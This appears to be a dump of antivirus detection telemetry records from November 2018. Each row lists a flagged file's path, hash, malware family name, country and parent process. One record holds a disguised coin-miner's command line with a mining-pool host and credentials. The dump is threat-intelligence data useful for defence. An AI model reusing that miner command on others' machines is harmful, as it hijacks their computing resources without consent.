  Row(detection=Row(filename='avscan-20181101-155637-c7f54b7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155637-C7F54B7A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='33e1ec0aac064c83afb7e756d2a65c30af9a1a7eae565456582f34ca6a690ced', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T23:39:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:55:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:13:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='33828369730247712ee6878d8fbb0ac61007dfdb6e2771a429ded6e06747b954.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\33828369730247712EE6878D8FBB0AC61007DFDB6E2771A429DED6E06747B954.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='33828369730247712ee6878d8fbb0ac61007dfdb6e2771a429ded6e06747b954', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:44:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bipartit 2014.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\dokumentasi bipartit 2014\\bipartit 2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='auditpol.exe', filepath='C:\\Windows.old.000\\Windows\\System32\\auditpol.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='4e95a56a9aa46cd0dc97be82e018de63ab66b1eee23712526aa40d5af6e292ab', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T02:42:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160141-fb2435ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160141-FB2435ED', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T22:42:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sep0313.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PAGI\\SEP0313\\SEP0313.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110043-ad0af455', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110043-AD0AF455', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110554-d4371e27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110554-D4371E27', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\nhm_windows_1.8.1.11\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:43:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110127-b28eb026', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110127-B28EB026', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='giant savingsgui.exe', filepath='C:\\Program Files (x86)\\Giant Savings\\Giant SavingsGui.exe', filesize=2096000, name='Adware/CrossRider.whjz.#M1.#R1'), hash='62c965e6c6d4f2658f1c9fbc3d020ab0db5105401c871e8cb8565bdfbf463750', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\wicainventory.exe', parentsize=None, timestamp='2018-11-01T09:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='{6bcff948-8f2f-4387-b019-682de18dcd55}.{af33dc95-fe6f-446d-b44d-aa1ace12b031}', filepath='g:\\\xa0\\{6BCFF948-8F2F-4387-B019-682DE18DCD55}.{AF33DC95-FE6F-446D-B44D-AA1ACE12B031}', filesize=24216000, name='WORM/Taranis.1075.#M1.#R1'), hash='bf5a50bdcc7716f8e91c53182908eda99cacedf60f8f2542190492e993016788', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\start.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cscript.exe', filepath='C:\\PROGRAM FILES\\OFFICE 2010 激活文件\\MINI-KMS 1.3\\cscript.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f061c0a99b876ca1154830083b9c8e8a10e4e88d027298175e50bbd12161d6b0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:49sueK368k+zChEF.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210447-4d3e62d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23dd5805\\AVSCAN-20181101-210213-3C49D68C\\AVSCAN-20181101-210447-4D3E62D6', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:04:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161647-f481f999', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161647-F481F999', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='5441907fe28239a849ec4ccd4a35949ef1045b30179a383300e62c9779c5c352', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163218-ae148fe6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17c53a39\\AVSCAN-20181101-163139-A6E8024E\\AVSCAN-20181101-163218-AE148FE6', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='ee0260544e952c11244cba40bb0b9cd684da26aee741eb4805841c5770f9acb5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\D:\\game\\天堂M\\Anubisbot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rfndnsis.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\ProgramData\\FlashBeat\\RfndNSIS.dll.vir', filesize=384000, name='ADWARE/CouponMarvel.Gen.#M300.#R6890'), hash='bdad06f446af863191c562845f334dca4adab448875c87e1191ee3d01ee60ba1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e62b25af09df99259bc5dcf78470b2394bf6114596123fd6f75b24adc53253b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\E62B25AF09DF99259BC5DCF78470B2394BF6114596123FD6F75B24ADC53253B9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e62b25af09df99259bc5dcf78470b2394bf6114596123fd6f75b24adc53253b9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123538-4916c79e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123518-37EB5E8F\\AVSCAN-20181101-123538-4916C79E', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsiE7C7.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T07:11:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsbCD3E.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:58:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kh pha an.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\KH pha an.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='5441907fe28239a849ec4ccd4a35949ef1045b30179a383300e62c9779c5c352', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.com.mobisystems.office.exe', filepath='G:\\.com.mobisystems.office.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:49:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r27bbfp.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2192791235-2971643662-3870428667-1000\\$R27BBFP.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='edcscan.dll', filepath='C:\\Program Files\\Samsung\\Easy Document Creator\\EDCScan.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='3e04e60e5f0ea586258f80ea963d4f8dad048b31d7206f3ec270a66fed8d6934', metadata=Row(cmdline='--engine=2 --session-id=JT8xt\\\\\\/\\\\\\/xpTJIIbi0cGjs\\\\\\/bYvVFeRc8CMQNQS7rQz --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\32.168.200\\software_reporter_tool.exe', parentsize=12408440, timestamp='2018-11-01T12:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autoupdater.exe', filepath='C:\\MCoffline\\MCoffline\\programs\\Program Files\\loader\\Autoupdater.exe', filesize=2944000, name='W32/Neshta.A.#M1.#R1'), hash='7163430361a2a624a529c5014db1b9e654f43c4207850191223c8e6c885d2b9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RmHHJUI+YUarABV9.1', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T23:00:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1fab4102ff47e6b1e0146f9c0d61d6828e3c265a34c45e1d5ef455187535ac9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1FAB4102FF47E6B1E0146F9C0D61D6828E3C265A34C45E1D5EF455187535AC9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1fab4102ff47e6b1e0146f9c0d61d6828e3c265a34c45e1d5ef455187535ac9f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:25:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172919-e3a7d649', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172919-E3A7D649', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='827b617e805d82d3dc529c33cec6c3056117d718cc7723188b591f54c3f58da8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:29:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='required.pif', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\br\\Required\\Required.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:36:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pfusstwainentry0416.dll', filepath='C:\\Program Files\\fiScanner\\ScandAll PRO\\PfuSsTwainEntry0416.dll', filesize=172000, name='W32/Ramnit.C.#M1.#R1'), hash='84d14f762fb86749aa3ba633b26f035e2d0a43b556bde23228041b4d966e29d0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:09:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-062252-9a7ba147', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-062141-8D67E3D0\\AVSCAN-20181101-062252-9A7BA147', filesize=264000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='70dc4b7638a3181d1dc908b6acfbbc3f351cf523072f97785e1b990659925ed8', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:22:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:00:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160806-473cda72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-160747-44C4BBF9\\AVSCAN-20181101-160806-473CDA72', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:08:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scvhost.exe', filepath='c:\\users\\X\\appdata\\roaming\\update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline='-o http:\\/\\/us3.eclipsemc.com:8337 -u lanus_4 -p pavlaka -k diablo', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\cmd.exe', parentsize=232960, timestamp='2018-11-01T18:11:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114410-033e2a74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-114401-01E93E8A\\AVSCAN-20181101-114410-033E2A74', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='conhost.exe', filepath='\\systemroot\\system32\\conhost.exe', filesize=840000, name='HEUR/AGEN.1023043.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline='0xffffffff', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:54:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='airxonix1 .exe', filepath='\\?\\J:\\العاب\\AirXonix1\\AirXonix1 .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='4b038c1a1d3b2a46d2c343a6f7aa7cd75afe9b50090ec193bb6e27b35ac4b0e0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003532-8d5fc778', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003532-8D5FC778', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:35:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='beservice_x64.exe', filepath='\\?\\J:\\BlackShot\\System\\BattlEye\\BEService_x64.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='58cbaa3fac3dddd8771feeebfb9fcf4a4428b6a115e84cd349b82d25c63172be', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:13Z'), dt=datetime.date(2018, 11, 1)),
